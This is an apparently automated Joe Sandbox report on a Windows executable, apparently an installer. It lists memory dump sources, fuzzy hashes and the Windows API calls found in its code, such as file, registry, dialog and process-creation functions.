• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
• Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
• Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
• Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
APIs
• GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
• Instruction ID: 83b49fe15d4d51a1c27b4b8da2ab4689423c6710ab607d501633f61f971848cf
• Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
• Instruction Fuzzy Hash: 63D0C972504220BFC2102728AE0889BBB55DB552717028A35FCA9A22B0CB314C6A86A4
APIs
• CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
• GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
APIs
• CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
• CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• MoveFileW.KERNEL32(00000000,00000000), ref: 004016BB
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FileMove
• String ID:
• API String ID: 3562171763-0
APIs
• SetFilePointer.KERNEL32(00000000,?,00000000,?,?), ref: 004028D4
  • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FilePointerwsprintf
• String ID:
• API String ID: 327478801-0
APIs
• FindNextFileW.KERNELBASE(00000000,?,?), ref: 00402917
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FileFindNext
• String ID:
• API String ID: 2029273394-0
APIs
• RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406566
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
APIs
• WriteFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,00420DE6,0041E6F0,0040359E,0041E6F0,00420DE6,004266F0,00004000,?,00000000,004033C8,00000004), ref: 00406258
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• ReadFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,004266F0,0041E6F0,0040361A,00008001,00008001,0040351E,004266F0,00004000,?,00000000,004033C8), ref: 00406229
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• MessageBoxIndirectW.USER32(0040A3E0), ref: 00405D5D
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: IndirectMessage
• String ID:
• API String ID: 1874166685-0
APIs
• RegOpenKeyExW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,0040659D,?,?,?,?,Remove folder: ,?,00000000), ref: 00406533
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
APIs
• SetDlgItemTextW.USER32(?,?,00000000), ref: 0040463B
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: ItemText
• String ID:
• API String ID: 3367045223-0
APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,0040441A), ref: 0040464D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                              • Opcode ID: c073a5ec0840fd0a4d417e8cf15a40d0e4bc79272bf166bfe9221ef36532abb8
                                                                                                                                              • Instruction ID: f5342d9634f29a5dfc1e0db37023d9f0ac9e73469a68d8a9939ce4b2318c467f
                                                                                                                                              • Opcode Fuzzy Hash: c073a5ec0840fd0a4d417e8cf15a40d0e4bc79272bf166bfe9221ef36532abb8
                                                                                                                                              • Instruction Fuzzy Hash: 28A0017A484900ABCA06AB50EF1A80ABB62FBA5705B518879B285510348B725820FB19
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                                • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                                • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                                • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2972824698-0
                                                                                                                                              • Opcode ID: 0ca44847665e9aed309d99185b61354d5aa0b5474cd0cc683bca3159d0948431
                                                                                                                                              • Instruction ID: 39264c5466c0a9c1499aa9251a9428ad8f628c8ba18ccf0a3388d06020594a91
                                                                                                                                              • Opcode Fuzzy Hash: 0ca44847665e9aed309d99185b61354d5aa0b5474cd0cc683bca3159d0948431
                                                                                                                                              • Instruction Fuzzy Hash: ABF0FC31904111DBEB20BBA55AC94AE7260CF00318F10413FE202B21D5CABC4D41A65E
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: f18e2d7214b30d3dc46271dbcb4a7f92884385a6914c4136972039e1db28dba1
                                                                                                                                              • Instruction ID: 59c12c35bbb872f0caeb150da19be0ad997f967f675472e8316fb546946162d5
                                                                                                                                              • Opcode Fuzzy Hash: f18e2d7214b30d3dc46271dbcb4a7f92884385a6914c4136972039e1db28dba1
                                                                                                                                              • Instruction Fuzzy Hash: DAD05E73A146008BD744EBB8BE8546F73A8EA50319320483BD142E10A1E6B88901461C
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                                                                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00405188
                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
                                                                                                                                                • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004052CC
                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 004052EA
                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004054B8
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004054C8
                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00405672
                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 0040567D
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405684
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                              • String ID: $M$N
                                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                                              • Opcode ID: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                              • Instruction ID: 154044203e87ae86578454b6b14b757097bfc819611b9ce4677548c75e4aac0f
                                                                                                                                              • Opcode Fuzzy Hash: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                              • Instruction Fuzzy Hash: D8028D70900609AFDB20DFA5CD85AAF7BB5FB45314F10857AF910BA2E1D7B98A41CF18
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
• GetDlgItem.USER32(?,000003E8), ref: 00404892
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
• GetSysColor.USER32(?), ref: 004048C0
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
• lstrlenW.KERNEL32(?), ref: 004048E1
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
• GetDlgItem.USER32(?,0000040A), ref: 0040495C
• SendMessageW.USER32(00000000), ref: 00404963
• GetDlgItem.USER32(?,000003E8), ref: 0040498E
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
• LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
• SetCursor.USER32(00000000), ref: 004049E2
• LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
• SetCursor.USER32(00000000), ref: 004049FE
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: N$Remove folder: $WG@
• API String ID: 3103080414-2486083310
• Opcode ID: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
• Instruction ID: 519c373e7f185e7fda66e670232f02753279bd673d39c82729c50cf19e81ba39
• Opcode Fuzzy Hash: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
• Instruction Fuzzy Hash: 6461B3B1A40209BFDF10AF60CD85A6A7B79FB84304F00843AFA15B62D0D779A951CF99
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00464260,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
• Instruction ID: dda4e0b8355a10cf3a4659add9ec42a83d374e9472f600803517c33aed587cab
• Opcode Fuzzy Hash: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
• Instruction Fuzzy Hash: 96418A71804209AFCF058FA5DE459BFBBB9FF45314F00802EF991AA1A0C7749A55DFA4
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
• GetShortPathNameW.KERNEL32(?,0045ADE8,00000400), ref: 0040632C
  • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
  • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
• GetShortPathNameW.KERNEL32(?,0045B5E8,00000400), ref: 00406349
• wsprintfA.USER32 ref: 00406367
• GetFileSize.KERNEL32(00000000,00000000,0045B5E8,C0000000,00000004,0045B5E8,?,?,?,?,?), ref: 004063A2
